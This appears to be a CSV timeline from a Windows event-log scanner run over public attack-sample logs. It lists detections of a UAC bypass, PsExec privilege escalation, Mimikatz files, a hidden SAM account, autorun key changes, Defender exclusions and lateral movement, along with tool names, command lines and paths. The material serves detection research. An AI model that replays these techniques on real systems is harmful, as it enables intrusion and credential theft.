2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 8716 | PGUID: 6A3C3EF2-8739-5FBF-0000-001075514700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
2020-11-26 19:45:24.216 +09:00,02694w-win10.threebeesco.com,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,rules/sigma/image_load/sysmon_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: byeintegrity5-uac.exe | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x6ca44 | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-27 02:38:11.147 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\Public\tools\privesc\uac\system32\npmproxy.dll | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-27 02:38:11.147 +09:00,LAPTOP-JU4M3I0E,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: taskhostw.exe $(Arg0) | Process: C:\Windows\System32\taskhostw.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x6c9e0 | PID: 17336 | PGUID: 00247C92-E803-5FBF-0000-0010CDB9B40C,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: taskhostw.exe $(Arg0) | LID: 0x6c9e0 | PID: 16980 | PGUID: 00247C92-E803-5FBF-0000-0010F2BFB40C",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 8536 | PGUID: 747F3D96-BB00-5FCA-0000-001033CD7600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-05 07:41:05.471 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49792 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-33FC-5FCB-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx
2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe | Process: C:\Users\Public\psexecprivesc.exe | User: MSEDGEWIN10\user02 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x7485cb | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 16344 | PGUID: 747F3D96-00D9-5FD1-0000-001021855301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,Exec,PsExec Service Start,,rules/sigma/process_creation/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,Exec,PsExec Tool Execution,,rules/sigma/process_creation/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: System | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:42.933 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50335 () | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:42.934 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50336 () | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 876 | PGUID: 747F3D96-76FB-5FD1-0000-0010E6C40000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 | Process: C:\Windows\System32\mspaint.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 7988 | PGUID: 747F3D96-00DD-5FD1-0000-0010F7D25301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx
2020-12-10 07:45:33.090 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\onedrive.exe | Process: System | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx
2020-12-10 07:45:34.204 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49791 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx
2020-12-10 20:18:52.190 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49851 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-10 20:18:52.191 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49852 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-10 20:18:52.447 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49853 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:49847 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 2784 | PGUID: 747F3D96-FFEE-5FD1-0000-00101DDF0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 5580 | PGUID: 747F3D96-041E-5FD2-0000-001024DF3B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx
2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50007 (MSEDGEWIN10) | Dst: 10.0.2.17:135 (MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50008 (MSEDGEWIN10) | Dst: 10.0.2.17:49666 (MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
2020-12-17 19:38:33.951 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: WCESERVICE | Path: D:\Service\test.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2020-12-19 02:56:07.017 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Hidden Local Account Created | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\hideme0007$\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 747F3D96-68DD-5FDD-0000-00101B660000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_hidden_local_account_sysmon.evtx
2021-01-26 22:21:13.237 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\~DF0187A90594A6AC9B.TMP | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:13.558 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\b8162606fcd2bea192a83c85aaff3292f908cfde | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
